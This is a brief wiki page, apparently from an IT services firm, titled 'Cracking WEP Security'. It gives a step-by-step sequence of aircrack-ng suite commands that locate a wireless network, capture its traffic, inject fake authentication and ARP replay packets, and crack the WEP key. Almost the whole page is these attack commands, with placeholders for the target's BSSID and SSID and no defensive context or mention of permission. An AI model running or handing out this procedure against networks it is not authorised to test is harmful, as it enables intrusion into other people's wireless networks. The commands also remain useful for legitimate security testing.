Cracking WEP Security

From M L Vision Network Services Wiki

Jump to: navigation, search

Find the wireless network:

airodump-ng eth1

Monitor the wireless network:

airodump-ng -c [CHANNEL] -w [FILENAME] --bssid [BSSID] eth1

Capture authentication:

aireplay-ng -1 0 -a [BSSID] -e [SSID] eth1

Replay authentication:

aireplay-ng -3 -b [BSSID] eth1

Crack key:

aircrack-ng -n [BITS] -b <BSSID> [FILENAME]
Personal tools